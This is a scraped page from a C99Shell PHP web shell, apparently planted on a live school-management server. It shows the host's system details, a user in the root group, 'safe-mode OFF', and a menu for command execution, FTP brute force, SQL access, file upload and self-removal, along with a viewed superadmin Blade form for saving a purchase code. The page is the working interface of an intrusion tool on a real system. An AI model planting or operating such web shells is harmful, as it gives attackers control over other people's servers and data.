!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/superadmin/settings/   drwxr-xr-x
Free 29.21 GB of 117.98 GB (24.76%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     save_purchase_code_form.blade.php (1.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<form action="{{ route('superadmin.save_valid_purchase_code', 'update') }}" class="mt-3" method="post">
    @CSRF
    <div class="form-group">
        <label for="purchase_code_form_field">{{ get_phrase('Purchase code') }}</label>
        <input type="text" class="form-control mb-1" name="purchase_code" id="purchase_code_form_field">
        <small id="invalid_purchase_code_message" class="d-hidden badge bg-danger">{{ get_phrase('Invalid purchase code') }}</small>
    </div>
    <div class="form-group mt-3">
        <button class="btn btn-primary" onclick="save_purchase_code()" type="button">{{ get_phrase('Submit') }}</button>
    </div>
</form>

<script type="text/javascript">
    "use strict";
    function save_purchase_code(){
        var purchase_code = $('#purchase_code_form_field').val();
        $.ajax({
            url: '{{ route('superadmin.save_valid_purchase_code', 'update') }}',
            type: 'post',
            data: {purchase_code : purchase_code},
            headers: {
                'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
            },
            success: function(response) {
                if(response == 1){
                    window.location.reload();
                }else{
                    $('#invalid_purchase_code_message').show();
                }
            }
        });
    }
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--